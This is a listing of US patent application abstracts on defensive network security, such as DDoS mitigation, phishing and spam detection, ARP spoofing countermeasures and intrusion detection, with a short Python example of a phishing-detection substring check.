20080256632APPARATUS AND METHOD FOR DETECTION OF A DENIAL OF SERVICE ATTACK ON AN INTERNET SERVER - An apparatus and method to detect a denial of service attack on an internet server by a hacker or malevolent software while effectively distinguishing an attack from a spike in demand by legitimate users of the server. In preferred embodiments, the kernel's TCP implementation is modified to hold back sending a reset (RST) to terminate the connection and to make an entry into a dead connection list when a connection attempt is dropped off of an overflowing accept queue. The entries are removed from the dead connection list when they become stale or an ACK is received corresponding to the entry. Additional TCP kernel parameters include a monitor enable to turn on or off the DoS monitor, a monitor threshold to determine when to send an alarm, and a stale time that is a timeout value to determine when to remove entries from the dead connection list.10-16-2008
20110252473Protection of Computer System - Protection of a computer system (10-13-2011
20100058471METHOD AND SYSTEM FOR DEFENDING DDOS ATTACK - In a method of defending against a Distributed Denial of Service (DDoS) attack, an attack target server determines whether the attack target server suffers a DDoS attack from a plurality of terminals and, according to a result of the determination, informs a control server that the attack target server suffers the DDoS attack by transmitting its own information to the control server. The control server which has received the information of the attack target server confirms the plurality of terminals which transmit data to the attack target server and transmits an attack prevention message to the plurality of confirmed terminals. Each of the plurality of terminals which has received the attack prevention message determines whether the terminal launches the DDoS attack and, according to a result of the determination, blocks the DDoS attack.03-04-2010
20100058469ANOMALY INFORMATION DISTRIBUTION WITH THRESHOLD - Embodiments of the present disclosure provide techniques for distributing information about possible anomalies in a network. A sensor in a network may detect packets with payloads that match an anomaly signature. Address dispersion information, for example, in the form of source and address bitmaps, may be gathered at the sensor. The address dispersion information may be distributed to one or more peer sensors if the information indicates that the number of different addresses of the detected matching packets exceeds a threshold.03-04-2010
20100058467EFFICIENCY OF ACTIVE CONTENT FILTERING USING CACHED RULESET METADATA - A start offset and an end offset can be identified within unfiltered content that is to be filtered. This unfiltered content can include HTML content. A corresponding start offset and an end offset of the unfiltered content can be matched against a set of content objects contained in a content cache. Each of the content objects can be associated with rule metadata. At least one filter rule can be extracted from metadata of a matching cache object. A programmatic action can be performed based upon the extracted filter rule. Computer readable output can result from the programmatic action. The output can include content that has been filtered in accordance with the extracted filter rule.03-04-2010
20100251367METHOD AND APPARATUS FOR PROVIDING INFORMATION ASSURANCE ATTRIBUTES THROUGH A DATA PROVIDENCE ARCHITECTURE - A method and apparatus that provides information assurance attributes through a data providence architecture is disclosed. The method may include receiving a message having a data provenance wrapper, examining each data provenance record of the message and any attachments for discrepancies, identifying any discrepancies in the examination of each data provenance record of the message and any attachments; calculating a degree of trust based on any discrepancies identified in the examination of each data provenance record of the message and any attachments, and outputting the degree of trust to the user.09-30-2010
20110107421METHOD AND APPARATUS FOR PROVIDING FRAUD DETECTION USING CONNECTION FREQUENCY THRESHOLDS - An approach provides detection of unauthorized use of data services. A determination is made as to whether connections supporting remote access to a data network are completed. The number of completed connections associated with a selected attribute is tracked over a time period. It is then determined whether the number of completed connections satisfies a connection frequency threshold. A fraud alert is generated if the connection frequency threshold is satisfied.05-05-2011
20110083179SYSTEM AND METHOD FOR MITIGATING A DENIAL OF SERVICE ATTACK USING CLOUD COMPUTING - A system and method for mitigating a denial of service attack that includes distributing network communication messages directed at a resource within a resource cloud, directing the distributed network communication messages, filtering the network communication messages according to filter parameters that relate to the legitimacy of the communication message, and sending the communication message to the resource if the communication message is filtered as legitimate or performing a request limiting response to the communication message if the communication message is filtered as illegitimate.04-07-2011
20110252472Bot-Network Detection Based on Simple Mail Transfer Protocol (SMTP) Characteristics of E-Mail Senders Within IP Address Aggregates - A method and system for determining whether an IP address is part of a bot-network are provided. The IP-address-aggregate associated with the IP address of an e-mail sender is determined. The IP-address-aggregate is associated with an IP-address-aggregate-category based on the current SMTP traffic characteristics of the IP-address-aggregate and the known SMTP traffic characteristics of an IP-address-aggregate-category. A bot-likelihood score of the IP-address-aggregate-category is then associated with the IP-address-aggregate. IP-address-aggregate-categories can be established based on historical SMTP traffic characteristics of the IP-address-aggregates. The IP-address-aggregates are grouped based on SMTP characteristics, and the IP-address-aggregate-categories are defined based on a selection of IP-address-aggregates with similar SMTP traffic characteristics that are diagnostic of spam bots vs. non-botnet-controlled spammers. Bot likelihood scores are determined for the resulting IP-address-aggregate-categories based on historically known bot IP addresses.10-13-2011
20100251365DYNAMIC SCANNING BASED ON COMPLIANCE METADATA - In embodiments of the present invention improved capabilities are described for systems, methods, and devices that assess a metadata factor associated with metadata of code to determine a compliance state of said code; assign or adjust a security sensitivity factor based at least in part on said compliance state of said code; and provide a security facility with an indicator of how aggressively to monitor the code for malicious code infection.09-30-2010
20100251368SYSTEM AND METHOD FOR HANDLING AN EVENT IN A COMPUTER SYSTEM - Systems for handling an event in a computer system which has a kernel-mode and a user-mode. The systems comprise at least one computing device. The computing device is configured to suspend an occurrence of the event in the kernel-mode of an operating system running thereon. The computing device is also configured to cause the event to occur in the user-mode of the operating system. The computing device is further configured to determine if an occurrence of the event in the kernel-mode will compromise the computer system by analyzing the occurrence of the event in the user-mode. If it is determined that the occurrence of the event in the kernel-mode will compromise the computer system, then the computing device executes at least one security measure.09-30-2010
20100251366DISCOVERY OF THE USE OF ANONYMIZING PROXIES BY ANALYSIS OF HTTP COOKIES - In embodiments of the present invention improved capabilities are described for systems, methods, and devices that determine whether a website request is from a proxy website or an anonymizer. Embodiments intercept a website request from an end point; identify at least one cookie present in said website request; analyze a predetermined characteristic of said website request, where the predetermined characteristic is associated with the cookie; and apply a rule corresponding to said predetermined characteristic to make the determination as to whether the request is from a proxy website or anonymizer.09-30-2010
20120304295Method and Apparatus for Detecting Computer Fraud - Techniques are provided for detecting computer fraud. The techniques include obtaining a text version of a candidate destination and a graphical rendering of the candidate destination, comparing the text version of the candidate destination and the graphical rendering of the candidate destination with a corresponding text version of a stored destination and a corresponding graphical rendering of the stored destination, and generating a fraud warning if the graphical rendering of the candidate destination is substantially similar to the graphical rendering of the stored destination while the text version of the candidate destination differs substantially from the corresponding text version of the stored destination.11-29-2012
20120304294Network Monitoring Apparatus and Network Monitoring Method - According to one embodiment, a network monitoring apparatus includes an unauthorized node determination module, a spoofed address resolution protocol request transmission module, and a spoofed address resolution protocol reply transmission module. The unauthorized node determination module determines whether a sender node which transmits an address resolution protocol request packet is an unauthorized node. The spoofed address resolution protocol request transmission module transmits a spoofed address resolution protocol request packet to a target node corresponding to a target network address in the address resolution protocol request packet if the sender node is an unauthorized node. The spoofed address resolution protocol reply transmission module transmits to the unauthorized node a spoofed address resolution protocol reply packet which includes a predetermined physical address other than the physical address of the target node as a sender physical address and a network address of the target node as a sender network address.11-29-2012
20120304292EXTERNAL LINK PROCESSING - A system and method of external link processing is disclosed. The system includes an interface configured to receive a user request to access an encoded external link in networked content. The encoded external link comprises a domain name of an external link server and an encoded portion which is an encoded result of an original external link encoded with an encoding function, wherein the original external link is an address to an external destination. One or more processors determine a safety level of the encoded external link using a criterion. In the event that the determined safety level of the encoded external link is determined unsafe, a warning message is generated indicating that the original external link is unsafe and the user is prevented from directly navigating to the original external link.11-29-2012
20120304291ROTATION OF WEB SITE CONTENT TO PREVENT E-MAIL SPAM/PHISHING ATTACKS - Embodiments of the invention provide a method, system and computer program product for phishing attack management through Web site content rotation. In an embodiment of the invention, a method for phishing attack management through Web site content rotation is provided. The method includes receiving a request for a variation of a component to be incorporated into a Web page from a requesting Web page rendering engine from over a computer communications network. The method also includes comparing the requested variation of the component to a currently configured variation of the component. Finally, the method includes returning both the requested variation of the component and an alert indicating a possible phishing attack in response to the request if the requested variation of the component differs from the currently configured variation of the component.11-29-2012
20120304290CYBER ISOLATION, DEFENSE, AND MANAGEMENT OF AN INTER-/INTRA- ENTERPRISE NETWORK - Methodologies, tools and processes for the cyber isolation, defense, and management of an inter-/intra-enterprise network utilizing NSA-approved Type-1 encryptors, first to completely isolate all HardNet fixed and mobile participants from the logical internet; secondly, to enable inter-corporation traffic exchange while maintaining the established security barrier; and next, to create a network demarcation point through which all traffic shall enter or exit HardNet, and through which all traffic shall be inspected with DoD grade cyber security and information assurance (IA) capabilities. The effective net end result is a weapons-grade cyber security shield and cyber management capability for the business, educational, non-profit, governmental and all other enterprises.11-29-2012
20120304289ROTATION OF WEB SITE CONTENT TO PREVENT E-MAIL SPAM/PHISHING ATTACKS - Embodiments of the invention provide a method, system and computer program product for phishing attack management through Web site content rotation. In an embodiment of the invention, a method for phishing attack management through Web site content rotation is provided. The method includes receiving a request for a variation of a component to be incorporated into a Web page from a requesting Web page rendering engine from over a computer communications network. The method also includes comparing the requested variation of the component to a currently configured variation of the component. Finally, the method includes returning both the requested variation of the component and an alert indicating a possible phishing attack in response to the request if the requested variation of the component differs from the currently configured variation of the component.11-29-2012
20120304287AUTOMATIC DETECTION OF SEARCH RESULTS POISONING ATTACKS - Search result poisoning attacks may be automatically detected by identifying groups of suspicious uniform resource locators (URLs) containing multiple keywords and exhibiting patterns that deviate from other URLs in the same domain without crawling and evaluating the actual contents of each web page. Suspicious websites are identified and lexical features are extracted for each such website. The websites are clustered based on their lexical features, and group analysis is performed on each group to identify at least one suspicious group. Other implementations are directed to detecting a search engine optimization (SEO) attack by processing a large population of URLs to identify suspicious URLs based on the presence of a subset of keywords in each URL and the relative newness of each URL.11-29-2012
20120304286METHODS AND APPARATUS FOR BLOCKING USAGE TRACKING - Methods and apparatuses that maintain one or more data stores capable of storing local data in a device for loading a resource of a domain are described. The resource may be loaded to cause one or more data access operations on the data stores. Access to usage tracking data of the device from the domain may depend on at least one of the data access operations. The data access operations may be configured to block the usage tracking data of the device from the domain. The data access operations may be performed on the data stores for the loading of the resource. A web page may be presented to a user when the resource is successfully loaded.11-29-2012
20110088093USB CONNECTOR AND INTRUSION PREVENTION SYSTEM USING THE SAME - A security USB connector implements an intrusion prevention function preventing the propagation of malicious codes to a host terminal from a USB device while minimizing host terminal resource consumption, and an intrusion prevention system using the same are disclosed. A security USB connector is positioned between the host terminal supporting a USB host and a USB device, and a security inspection is performed on data transferred from the USB device to the host terminal through the security USB connector. Also, a host terminal without an intrusion prevention function can prevent an intrusion by using the portable security USB connector.04-14-2011
20110088092DETECTION OF NETWORK ADDRESS SPOOFING AND FALSE POSITIVE AVOIDANCE - A method for detection of network address spoofing and false positive avoidance in a network is described herein. The network may include one or more hosts and a network management system. The network management system may identify a suspicious host in the network. A condition indicative of network address spoofing by the suspicious host may be detected. It may be determined whether the spoofing condition is expected in normal traffic of the network. In response to a determination that the spoofing condition is expected, it is determined that the suspicious host generated normal traffic.04-14-2011
20110179486METHOD FOR NEUTRALIZING THE ARP SPOOFING ATTACK BY USING COUNTERFEIT MAC ADDRESSES - The present invention is related to a method for neutralizing a malicious ARP spoofing attack generated in a local network and in particular, the present invention provides a method for neutralizing an ARP spoofing attack comprising a step for detecting an ARP spoofing attack based on an ARP request packet generated for an ARP spoofing attack; a step for generating a plurality of counterfeit MAC addresses and dynamically changing MAC addresses of network devices or servers which are to be protected whenever an ARP spoofing attack is generated; and a step for neutralizing an ARP spoofing attack by using a counterfeit MAC address which is capable of neutralizing an ARP spoofing attack adequately.07-21-2011
20110078791Using chipset-based protected firmware for host software tamper detection and protection - A method, system, and computer program product for a host software tamper detection and protection service. A secure partition that is isolated from a host operating system of the host system, which may be implemented by firmware of a chipset of the host system, obtains file metadata from the host system and uses the file metadata to identify a first file for examination for tampering. The secure partition obtains data blocks for the first file, communicates with a service via an out-of-band communication channel, and uses information obtained from the service and the data blocks to determine whether the first file has been corrupted. The secure partition obtains the file metadata and the data blocks for the first file without invoking an operating system or file system of the host system.03-31-2011
20110072515METHOD AND APPARATUS FOR COLLABORATIVELY PROTECTING AGAINST DISTRIBUTED DENIAL OF SERVICE ATTACK - A method and apparatus for collaboratively protecting against a Distributed Denial of Service (DDoS) attack are provided. The method performed by a network apparatus includes detecting data suspected as being used in the DDoS attack by monitoring traffic forwarded to a service server, notifying a security apparatus that the detected data is suspected as being used in the DDoS attack, and performing at least one of a first operation and a second operation, the first operation being receiving an analysis result for the detected data from the security apparatus and controlling the traffic based on the analysis result, and the second operation being controlling, prior to the first operation, the traffic based on a rule set in advance.03-24-2011
20110078790API Signature Verification for High-Security Platforms - A system and method is disclosed for verifying whether a test API of a high-security software platform implements a reference API when a verification tool has insufficient permissions to detect one or more members of the test API. A signature is determined for a reference API implementation, which includes multiple API members. Determining the signature involves identifying a proper subset of the API members, where the subset excludes one or more API members that are not programmatically detectable by a given verification tool executing on a high-security platform that implements the reference API. The member may not be detectable by the verification tool because the tool has insufficient permission to programmatically detect the member on the high-security platform. The signature is then configured to indicate the members of the subset and not the excluded members. The signature is then stored.03-31-2011
20110078792SYSTEM AND METHOD FOR PROVIDING NETWORK SECURITY - A method includes receiving an indication of at least one detected security issue at a network device. The indication is received from a security agent at a security manager processor. The method includes polling, via the security manager processor, at least one other network device in response to the indication in order to retrieve additional information when the security manager processor determines that the additional information is needed. The method includes selecting, via the security manager processor, at least one executable security object responsive to the indication and the additional information. The method also includes initiating communication of the at least one executable security object to the network device via the security manager processor.03-31-2011
20110072516PREVENTION OF DISTRIBUTED DENIAL OF SERVICE ATTACKS - A method of automating the ability of a network to distinguish between traffic generated by automated means and traffic generated by human beings, for blocking automated traffic during a distributed denial of service attack, is disclosed. The method includes placing at least one validated traffic manager (VTM) computer on a computer network by a user. The method further includes monitoring a plurality of network requests by storing a plurality of user traffic source (UTS) lists, such as a white list, a grey list and a black list, on the at least one VTM computer. The method utilizes a reverse Turing test (RTT) that includes a human verification process (HVP) to distinguish between the traffic generated by human beings and the automated traffic.03-24-2011
20110072514Scan Engine Manager with Updates - A scan management system may configure various workloads and data streams within those workloads to be directed to various scan engines. The scan management system may be updatable and configurable by receiving a catalog of available scan engines and configuring the workloads and scan engines according to a policy that may be locally created and managed. The scan management system may be capable of reconfiguring the scan engines, including upgrading, adding, deprecating, and changing scan engines while being fully operational. In some cases, a single data stream may be scanned by two or more different scan engines, and a single scan engine may be used to scan two or more different data streams.03-24-2011
20130160116DATA SECURITY SEEDING SYSTEM - In one aspect of the invention there is provided a system for tracking seed data that has been inserted into a secured private information database listing. The system includes a network, computer, and database. Incoming communications to the network are monitored and are matched to a phone number, credit card number, address, email, or fax number that corresponds to the seed data. Depending on the incoming communication, software is configured to track and store third party identification information. The information is sent to a user to determine if the incoming phone call was conducted by breaching the secured private information database listing.06-20-2013
20130160117IDENTIFYING REQUESTS THAT INVALIDATE USER SESSIONS - An illustrative embodiment of a computer-implemented process for identifying a request invalidating a session excludes all marked logout requests of a Web application, crawls an identified next portion of the Web application and responsive to a determination, in one instance, that the state of the crawl is out of session, logs in to the Web application. The computer-implemented process further selects all crawl requests sent since a last time the crawl was in-session, excluding all marked logout requests and responsive to a determination that requests remain, crawls a selected next unprocessed request. Responsive to a determination, in the next instance, that state of the crawl is out of session and the selected request meets logout request criteria, the computer-implemented process marks the selected request as a logout request.06-20-2013
20110041178AUDITING A DEVICE - The auditing of a device that includes a physical memory is disclosed. One or more hardware parameters that correspond to a hardware configuration are received. Initialization information is also received. The physical memory is selectively read and at least one result is determined. The result is provided to a verifier.02-17-2011
20110035800MALICIOUS ADVERTISEMENT MANAGEMENT - Methods and systems are provided for managing malicious advertisements, including threats or risks posed by malicious advertisements or potentially malicious or risky advertisements. Methods are provided in which an advertisement is tested to determine behavioral characteristics at a non-active time and at an active time, and the two sets of characteristics are compared. If a difference is determined to exist, an action is taken that reflects a higher chance of the advertisement being malicious than if no difference was detected. Furthermore, the characteristics at a non-active time may be used in determining a degree of risk associated with an advertisement.02-10-2011
20110030054Progressive wiretap - Disclosed is a method and system for identifying a controller of a first computer transmitting a network attack to an attacked computer. To identify an attacker implementing the attack on the attacked computer, the present invention traces the attack back to the controller one hop at a time. The invention examines traces of the attacked computer to identify the first computer. Traffic transmitted to the first computer is redirected through a monitoring complex before being transmitted to the first computer. The controller is then detected from traffic monitoring by the monitoring complex.02-03-2011
20110016523APPARATUS AND METHOD FOR DETECTING DISTRIBUTED DENIAL OF SERVICE ATTACK - An apparatus for detecting a distributed denial of service (DDoS) attack includes: a monitoring unit for monitoring multiple GET requests and responses transmitted and received depending on a session establishment between a client and a server; and an attack detection unit for analyzing the monitored multiple GET requests and responses between the client and the server to detect a traffic of the DDoS attack against the server.01-20-2011
20110016522INTRUSION DETECTION SYSTEMS AND METHODS - Systems and methods for intrusion and virus detection in computer networks. Data from a file, network byte stream, or other source is segmented and resulting data items are subjected to multiple processing techniques to obtain respective result values, or thumbprints. The multiple thumbprints for respective data items are then aggregated to obtain a single result value, or aggregate thumbprint. The components of the aggregate thumbprint may be “fuzzified” to allow for less preciseness in the single result value. The aggregate thumbprint is compared to other similarly generated aggregate thumbprints stored in a library. Alerts may be generated when the same aggregate thumbprint is detected multiple times.01-20-2011
20110010772File System Event Tracking - Automated file system event tracking and reporting techniques are described in which file system events requested by a user application are intercepted and recorded prior to the request being permitted to pass to the file system for execution. Similarly, file system responses to a previously captured file system event are also intercepted and recorded. Predefined patterns of file system events may be aggregated and reported as a single event.01-13-2011
20100325727SECURITY VIRTUAL MACHINE FOR ADVANCED AUDITING - A security system collects an audit trail on a computer outside of a boundary created by one or more virtual machines. The security system uses a privileged virtual machine to collect audit logs for each protected virtual machine. As the protected virtual machines run, they send auditing information to the privileged virtual machine. The privileged virtual machine can collect auditing information from protected virtual machines much more quickly than a network server, as well as collecting auditing events from multiple protected virtual machines. Because the auditing destination is located on the same computer as the virtual machine monitored by the audit trail, no network dependency is present. Thus, the security system allows for monitoring the activity of administrators and other users while preventing tampering with the audit trail of each user's actions.12-23-2010
20110154489SYSTEM FOR ANALYZING MALICIOUS BOTNET ACTIVITY IN REAL TIME - A system for analyzing malicious botnet activity in real time is disclosed. This system may include: a control server configured to generate botnet activity information relating to a type of malicious botnet activity, and transmit the botnet activity information to the outside, after receiving bot occurrence information from the outside;06-23-2011
20110154488SYSTEMS AND METHODS FOR GENERATING AND MANAGING COOKIE SIGNATURES FOR PREVENTION OF HTTP DENIAL OF SERVICE IN MULTI-CORE SYSTEM - The present application is directed towards systems and methods for generating and maintaining cookie consistency for security protection across a plurality of cores in a multi-core system. A packet processing engine executing on one core designated as a primary packet processing engine generates and maintains a global random seed. The global random seed may be used as an initial seed for creation of cookie signatures by each of a plurality of packet processing engines executing on a plurality of cores of the multi-core system using a deterministic pseudo-random number generation function such that each core creates an identical set of cookie signatures.06-23-2011
20110258700VERIFYING AUTHENTICITY OF INSTANT MESSAGING MESSAGES - A method comprises performing verification of an IM message sent using a specified Instant Messaging (IM) screen name and received by an information recipient after successful verification of authenticity of an authentication certificate received by the information recipient from the specified IM screen name. Verifying the IM message includes successfully verifying authenticity of the IM message using authentication information contained in the received authentication certificate. The IM message includes an encoded checksum for designated parts of the IM message. Performing verification of the IM message includes verifying authenticity of the encoded checksum.10-20-2011
20110258699METHOD AND APPARATUS FOR THE PREVENTION OF A SERVICE DEGRADATION ATTACK - In a wireless communication system where the data transmission is optimized with respect to the channel state information fed back by the users, a service degradation attack can be made by feeding back faked channel state information. A method for preventing a service degradation attack on a first wireless communication device by a second wireless communication device in a wireless communication system, said method comprising: verifying by a base station whether the channel state information sent to the base station by the second wireless communication device corresponds to its real channel.10-20-2011
20100281536PHISH PROBABILITY SCORING MODEL - In general, embodiments of the invention relate to systems, methods, and computer program products for determining the probability that a given website is conducting or is related to fraudulent activity, including phishing activity. More particularly, embodiments of the invention relate to automatically monitoring and scoring URLs for fraudulent activity by parsing keywords, combinations of keywords, and other relevant data from an input communication, such as an email, and analyzing the data obtained against a database containing a plurality of grading factors.11-04-2010
20120151578Detecting a suspicious entity in a communication network - A method and apparatus for detecting a suspicious entity in a communication network. A receiving device receives a message from a sender. A processor obtains domain information or a user identity, and further contact information from data contained in the message. A reputation query message is sent to a Network Reputation Server (NRS), the reputation query message including the domain information or user identity. A reply is received from the NRS that indicates that the domain information or user identity is related to a suspicious entity. The receiving device then associates the contact information with the suspicious entity. In this way, if a user of the receiving device attempts to use the contact information, they can be prevented from doing this or informed that it relates to a suspicious entity.06-14-2012
20120204260Controlling access to sensitive data based on changes in information classification - A Data Loss Prevention (DLP) system includes an automated method for tracking changes to a security classification (e.g., content category) associated with an artifact to determine whether an attempt is being made to subvert a DLP policy. The method exploits the basic principle that, depending on context, the classification of a particular artifact, or a change to an existing classification, may indicate an attempt to subvert the policy. According to the method, an artifact classification state machine is implemented within a DLP system. For each policy-defined content category on each artifact, the machine identifies a content category change that may be of interest, as defined by policy. When a change in a classification has occurred, an artifact notification event (or, more generally, a notification of the change in classification) is issued.08-09-2012
20080229415SYSTEMS AND METHODS FOR PROCESSING DATA FLOWS - A flow processing facility, which uses a set of artificial neurons for pattern recognition, such as a self-organizing map, in order to provide security and protection to a computer or computer system supports unified threat management based at least in part on patterns relevant to a variety of types of threats that relate to computer systems, including computer networks. Flow processing for switching, security, and other network applications, including a facility that processes a data flow to address patterns relevant to a variety of conditions are directed at internal network security, virtualization, and web connection security. A flow processing facility for inspecting payloads of network traffic packets detects security threats and intrusions across accessible layers of the IP-stack by applying content matching and behavioral anomaly detection techniques based on regular expression matching and self-organizing maps. Exposing threats and intrusions within packet payload at or near real-time rates enhances network security from both external and internal sources while ensuring security policy is rigorously applied to data and system resources. Intrusion Detection and Protection (IDP) is provided by a flow processing facility that processes a data flow to address patterns relevant to a variety of types of network and data integrity threats that relate to computer systems, including computer networks.09-18-2008
20100083376METHOD AND APPARATUS FOR REDUCING FALSE POSITIVE DETECTION OF MALWARE - Method and apparatus for detecting malware are described. In some examples, files of unknown trustworthiness are identified as potential threats on the computer. A trustworthiness level for each of the files is received from a backend. The trustworthiness level of each of the files is compared to a threshold level. Each of the files where the trustworthiness level thereof satisfies the threshold level is designated as a false positive threat. Each of the files where the trustworthiness level thereof does not satisfy the threshold level is designated as a true positive threat.04-01-2010
20100058470MOBILE TERMINAL TO PREVENT VIRUS INFECTION AND METHOD OF CONTROLLING OPERATION OF THE MOBILE TERMINAL - A mobile terminal and a method of controlling operation of the mobile terminal may be provided that include outputting a sensing signal corresponding to a detected attempt to make a call, connecting the call when user input indicates that it is allowed to connect the call, and if the user input indicates that it is not allowed to connect the call, shutting down the detected attempt. Accordingly, suspicious operation that may have been caused by a virus may be shut down to prevent damage to a mobile terminal caused by a virus.03-04-2010
20100058468IDENTIFYING REPUTATION AND TRUST INFORMATION FOR SOFTWARE - Methods, systems, and computer program products identify trust and reputation information for an application. Status information including installation information and/or rating information corresponding to a software application is stored in a service or in a local computer cache. A software application is identified as corresponding to the status information, and the installation information and/or rating information is presented to a user prior to installation, launch, and/or update of the software application. Using the status information the user can make an informed decision on whether the user will trust the software application to permit the installation, launch, and/or update to occur.03-04-2010
20090288163CONTROLLING THE SPREAD OF INTERESTS AND CONTENT IN A CONTENT CENTRIC NETWORK - One embodiment of the present invention provides a system for controlling the spread of interests and content in a content centric network (CCN). During operation, the system maintains a routing policy for content data. The system also receives a packet associated with a piece of content or an interest for the content. Next, the system determines that the structured name included in the packet is within the namespace specified in the routing policy. The system further determines that the packet satisfies the condition in the routing policy. Subsequently, the system routes the packet based in part on the action corresponding to the condition as specified in the routing policy.11-19-2009
20090254990SYSTEM AND METHOD FOR INTELLIGENT COORDINATION OF HOST AND GUEST INTRUSION PREVENTION IN VIRTUALIZED ENVIRONMENT - A distributed and coordinated security system providing intrusion detection and intrusion prevention for the virtual machines (VMs) in a virtual server is described. The virtualization platform of the virtual server is enhanced with networking drivers that provide a "fast path" firewall function for pre-configured guest VMs that already have dedicated deep packet inspection security agents installed. A separate security VM is deployed to provide virtual security agents that perform deep packet inspection for guest VMs that are not pre-configured. The network drivers are then configured to intercept the data traffic of these guest VMs and route it through their corresponding virtual security agents, thus providing a "slow path" for intrusion detection and prevention.10-08-2009
20090254988EVALUATION APPARATUS, EVALUATION METHOD, EVALUATION PROGRAM AND INTEGRATED CIRCUIT - In a system for transmitting/receiving information, each of users of terminals subjectively determines a direct evaluation value of a party that the user knows personally and so on. Since the direct evaluation value determined in this way changes depending on the subjective evaluation criterion, the direct evaluation value is not generated based on the single evaluation criterion. In view of this, a terminal device 10-08-2009
20090241188COMMUNICATION MONITORING APPARATUS AND COMMUNICATION MONITORING METHOD - A communication monitoring apparatus includes a session extracting unit which extracts a packet in a session established between a pair of a transmitting device and a receiving device from a plurality of packets, a lead-packet extracting unit which extracts a lead packet including control information on communication between the transmitting device and the receiving device from the packet, a storage unit in which an unauthorized signature is stored, a verification unit which performs verification between the lead packet and the unauthorized signature, and an output unit which supplies a monitoring result indicating that the session extracted by the session extracting unit is an unauthorized communication when the lead packet includes a portion matched with the unauthorized signature.09-24-2009
20090222917DETECTING SPAM FROM METAFEATURES OF AN EMAIL MESSAGE - Detecting spam from metafeatures of an email message. As a part of detecting spam, the email message is accessed and a distribution of numerical values is accorded to a set of features of the email message. It is determined whether the distribution of numerical values accorded the set of features of the email message is consistent with that of spam. Access is provided to the determination of whether the email message has a distribution of numerical values accorded the set of features that is consistent with that of spam.09-03-2009
20090222918Systems and methods for protecting a server computer - A server computer protection apparatus protects a server computer against DoS attacks while still allowing access to the server. The server computer protection apparatus comprises a unit configured to calculate the load state of the server computer on the basis of the number of data requests made upon the server computer and the number of data responses of the server to those data requests, and to change the rate of data requests transferred to the server in accordance with the load state.09-03-2009
20110179485METHOD AND DEVICE FOR RECOGNIZING ATTACKS ON A SELF-SERVICE MACHINE - The invention relates to a method for recognizing attacks on at least one interface of a computer system, particularly a self-service machine, comprising: monitoring the interface in order to detect changes to the interface; if changes occur, the probability of an impermissible attack on the interface is determined based on the nature of the change; if the probability is above a defined threshold value, defensive measures are taken.07-21-2011
20080320591METHOD AND SYSTEM FOR VERIFYING IDENTIFICATION OF AN ELECTRONIC MAIL MESSAGE - A method and system for verifying identification of an electronic mail message. An electronic mail message including a signature and a key is received, the signature identifying a domain from which the electronic mail message originated and the key for verifying the signature. A key registration server of the domain is accessed to verify the key. The key registration server provides for verifying that a key used to sign an electronic mail message is valid and that the sender is authorized by the domain to send the electronic mail message from the return address.12-25-2008
20080282347Real-time network malware protection - A Network State Database (NSD) can comprise information regarding the network-centric state of one or more computing devices connected to a network. The information contained in the NSD can be passively received by the NSD, or it can be actively obtained by the NSD. Additionally, the NSD can comprise either a centralized collection of information, or a distributed collection of information independently maintained and conceptualized as a single entity. The information of the NSD can be used by a Network Risk Management Service (NRMS) to appropriately respond and protect the network. The NRMS can provide relevant information from the NSD to subscribers, which can independently act to protect the network. The NRMS can likewise itself instruct computing devices regarding an appropriate action, or it can itself instruct the performance of such action.11-13-2008
20120151579Network Device, Network Packet Processing Method and Computer Readable Storage Medium for Storing Thereof - A network device builds connection with a network through a Network Interface Card (NIC). The network device includes a processor and a storage unit. The processor includes at least one transmission processing core, at least one security core, and a main core. The storage unit stores a packet receiving module and a packet output module. The main core loads the packet receiving module to receive several packets from the network, makes the at least one transmission processing core process the packets for a network transmission and makes the at least one security core check the packets for security. The main core loads the packet output module to output the packets after the at least one transmission processing core processes the packets for network transmission and the at least one security core checks the packets for security.06-14-2012
20110055922Method for Detecting and Blocking Phishing Attacks - A method for detecting a suspected phishing attack characterized by monitoring strings of characters in a questionnaire presented by a non-approved address to a user terminal for similarity to a substring of a string of sensitive data, such that the substring has a length of one or more characters less than the length of the string of sensitive data, such that on detecting a substring of critical length, an alert is triggered.03-03-2011
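The substring check described in the entry above, as an added example that is not the patent's own code: a form served by an origin that is not on an allow-list is inspected, each field value is normalised, and an alert is raised when it overlaps a stored sensitive string by a substring at least a "critical" length long (a few characters short of the full secret). The allow-list, the sample secrets, the margin and the sample form are assumptions for the demo.

```python
# Added example (not the patent's own code): watch the strings a form from a
# non-approved origin asks the user for and alert when one of them overlaps a
# stored sensitive string by a substring of at least a "critical" length.
# APPROVED_ORIGINS, SENSITIVE and the margin below are assumptions for the demo.

APPROVED_ORIGINS = {"bank.example"}
# Constructed sample secrets; a real deployment would keep these in a protected store.
SENSITIVE = {"card": "4111111111111111", "ssn": "123456789"}


def critical_length(secret: str, margin: int = 4) -> int:
    """Alert threshold: a few characters short of the full secret, never below 4."""
    return max(4, len(secret) - margin)


def longest_common_substring(a: str, b: str) -> int:
    """Length of the longest substring shared by a and b (O(len(a)*len(b)) DP)."""
    best = 0
    prev = [0] * (len(b) + 1)
    for i in range(1, len(a) + 1):
        cur = [0] * (len(b) + 1)
        for j in range(1, len(b) + 1):
            if a[i - 1] == b[j - 1]:
                cur[j] = prev[j - 1] + 1
                best = max(best, cur[j])
        prev = cur
    return best


def inspect_form(origin: str, field_values: dict) -> list:
    """Return (field, secret_name, overlap) alerts for a form served by origin.

    Forms from approved origins are never inspected; for any other origin the
    value typed into each field is normalised (separators dropped) and compared
    against every stored secret."""
    if origin in APPROVED_ORIGINS:
        return []
    alerts = []
    for field, value in field_values.items():
        normalised = "".join(ch for ch in value if ch.isalnum())
        for name, secret in SENSITIVE.items():
            overlap = longest_common_substring(normalised, secret)
            if overlap >= critical_length(secret):
                alerts.append((field, name, overlap))
    return alerts


if __name__ == "__main__":
    # Constructed lookalike form: 14 of the 16 card digits typed so far.
    print(inspect_form("login-verify.example", {"cc": "4111 1111 1111 11"}))
```

Because the alert fires before the last characters of the secret are entered, the user is warned while the full value is still unsent; a short fragment such as a ZIP code that happens to share a few digits stays below the critical length and is not flagged.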
20110055921PROTECTING AGAINST DISTRIBUTED NETWORK FLOOD ATTACKS - A network security device performs a three-stage analysis of traffic to identify malicious clients. In one example, a device includes an attack detection module to, during a first stage, monitor network connections to a protected network device; during a second stage, to monitor a plurality of types of transactions for the plurality of network sessions when a parameter for the connections exceeds a connection threshold; and during a third stage, to monitor communications associated with network addresses from which transactions of at least one of the types of transactions originate when a parameter associated with that type of transaction exceeds a transaction-type threshold. The device executes a programmed action with respect to at least one of the network addresses when the transactions of that type originating from the network address exceed a client-transaction threshold.03-03-2011
